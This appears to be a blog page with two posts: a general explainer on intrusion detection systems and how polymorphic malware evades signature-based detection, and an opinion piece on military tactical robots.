A malware is essentially a software that is created and used to perform malicious activities on a network, or the systems present on that network. It is malicious code written with the intent to compromise critical systems and eventually steal highly sensitive information or destroy those compromised systems altogether. Many organisations use a defence in depth approach when it comes to choosing security controls that they could integrate into their network infrastructure to protect all the sensitive information contained in their systems. One such device that is used widely across the surface of the giant round rock that we all live on is the Intrusion Detection System or IDS. It is used by companies in their networks behind a firewall, and it offers threat detection security controls that can be very useful for knowing whether any malicious activities are happening on the company's network. The information provided by an IDS can be used to devise actions that should be taken if there is an anomaly detected on the network.
The main types of IDS devices that are used in the IT industry are, namely, protocol-based IDS, signature-based IDS, network traffic pattern based IDS, anomaly-based IDS, and stack-based IDS. A protocol-based IDS is usually installed on a web server, and it sits between the web server being protected and the devices that connect to that server. It monitors and analyses the protocols being used in the communication between the web server and the connecting devices, and checks the state and behaviour of the protocol being used to detect any malicious activity. It enforces the correct use of the protocol being used. A signature-based IDS works by analysing series of bytes that it receives and matching their fingerprints with the fingerprints that it has stored in its database, and then tries to figure out whether the fingerprint matches some malicious code or not and acts accordingly. A network traffic pattern based IDS analyses the network traffic and compares the pattern with a baseline pattern and alerts if there is any diversion in the traffic from the baseline. An anomaly-based IDS detects whether the systems are diverting from their baseline operations and alerts if they do diverge from that baseline. However, it is more prone to a high false-positive rate and can also be fooled by a very well-orchestrated attack. Stack-based IDS integrates itself very closely with the TCP/IP protocol stack and watches the packet as it traverses up the network protocol stack layer by layer and monitors the network data packets before the packet reaches the operating system or the application for processing. However, all these IDS devices cannot block all malicious activity and can be fooled.
One technique exists that can fool an IDS quite easily. It is called polymorphism. Polymorphism can and is being used to by threat actors to write malicious code that can change itself periodically while still making the code do what it intended to do initially. This technique evades signature-based detection as the signature of the code becomes different each time, and about 20 to 30 per cent of the file gets changed. Even though the attack code within a polymorphic malware remains the same in all its variants, the malware's signature gets changed by a huge factor, so even if there are a lot of people in a company who accidentally downloaded that malware the signature-based IDS would not be able to match the file signature the next time the malware reaches it. The polymorphic malicious code gets changed and, hence, the IDS is not able to detect what those bytes are, and thus, the malware is able to get into the network quite easily. This is how polymorphism works to evade even the state-of-the-art Intrusion Detection Systems. The various types of polymorphic malware are worms, viruses, and trojans. Multiple types of polymorphic shellcodes can also be written to fool an IDS and perform malicious functions, such as buffer overflows, on the systems and applications present on a company's network. Polymorphic malware tries to blend in with the normal network traffic, and therefore, organisations struggle to protect themselves from polymorphic malware.
An Intrusion Prevention System (IPS) is a device that is placed "in-line" with the packet stream and has the ability to actually stop any malicious packet transmission. First generation IPS devices used signature-based prevention techniques, and therefore, were not effective against attacks that leveraged polymorphism. Next-gen IPSs inspect packets using processes that include content, context, application and user awareness. Hence, if your organisation is still using the first generation IPSs, it's time to upgrade to the Next-gen ones.
It can be inferred then that Artificial Intelligence (AI), Machine Learning and Heuristics are solutions that can be used to prevent polymorphic malware from entering the network. These solutions work by detecting what kind of events are happening on the network, such as a file getting changed, and then determining whether or not a particular executable is a malware. However, the implementation of these solutions depends on the type of environment, whether it is small, medium or large scale, as these techniques use up a lot of computing resources, and depending on that these solutions might or might not be feasible to implement. In very larger-scale environments the implementation of such solutions becomes highly infeasible as a lot of things need to be checked to detect malicious activities by these solutions, which could slow down the work process.
So, beware the next time you download the same thing that someone you know did the other day because you never know what that file might really be!

Read More

14

March, 2019

Machines in a hostile environment

It's the rise of machines in 2019, and it's not just the smart television, smartphone, or that smart assistant that helps you turn the lights on or off we are talking about. We are talking about the industrial robots that are being rapidly evolved and being used for various applications all around the planet that we all live on. In this blog, we discuss what these industrial robots actually are and how they can and are being used for tactical purposes in hostile situations, such as deploying weapons of mass destruction. Don't worry, there won't be any robot throwing a bomb near or shooting a missile at you any time soon as these lethal humanoids are still in their testing phase.
... These industrial tactical robots are not your typical robots who clean the floor at the press of a button or read bedtime stories for your children. These are the machines designed to withstand any hostile situations, such as bombings, shootouts, and heavy artillery fire, you name it, and these cyborgs can get into that situation and take control of it. A lot of research and development has been done on this type of robots, and a lot of them are being deployed by various organisations, such as the military for security, surveillance, defense, collecting intelligence and inspection purposes. This necessarily means that robots are not just tin-cans anymore, and can and are being used to do things that are way too unimaginable for human beings to do on their own.
Currently, there exist drones that can be controlled remotely and be flown to remote, hostile locations and be used to upload videos of that location for collecting intelligence or through that video feed help the military choose targets on which they could drop missiles from a far away distance. What if a situation arises when a bomb has to be planted in a remote location where no human can even think of setting foot in, or it is too dangerous to send in any military troops to that location? If soldiers are somehow sent, they would be risking their precious lives to serve the purpose. To avoid such a situation, one might just think of sending in aerial vehicles for the bombing, but what if it's too dangerous to send in aerial vehicles as well? This is when these tactical robots can come in handy. As they are built by using materials that can withstand high heat, pressure, force and stress, are less prone to damage and are not living creatures, these robots could just be the best option to use to deploy any weapon of mass destruction. They could be taken to or dropped off aerially near the remote locations where humans can't even think of reaching, and then remotely controlled and taken to the hostile target location, undetected, be made to send video feeds, and finally plant a bomb at the site or be made to shoot highly damaging missiles on targets. As a result of this, bloodshed of a country's troops could be prevented, and a vast number of lives could be saved.
The technology already exists, and many companies are leveraging that technology to venture off into manufacturing tactical robots, and are already circulating them out into the market. But the already existing industrial robots can only be controlled from a very short distance, and that can pose a risk to the people controlling them. The manufacturing companies along with many others could work in collaboration and take up initiatives to create such machines and offer them to militaries so that they can use them out on the battlefield. But, not everyone thinks of the benefits of the whole society. Similarly, not all companies are willing to participate in collaborative efforts and driven by the greed to earn themselves more and more money and beat their competition, they selfishly and egoistically ignore the benefits that their collective effort could provide to their country's defensive lines. They merely reject collaborating with their competitors in order to become the best in a capitalist environment. They don't even think about how many lives their efforts could save, but instead, they keep their focus towards making that extra buck.
One would wonder, what kind of senseless beings they are?

Read More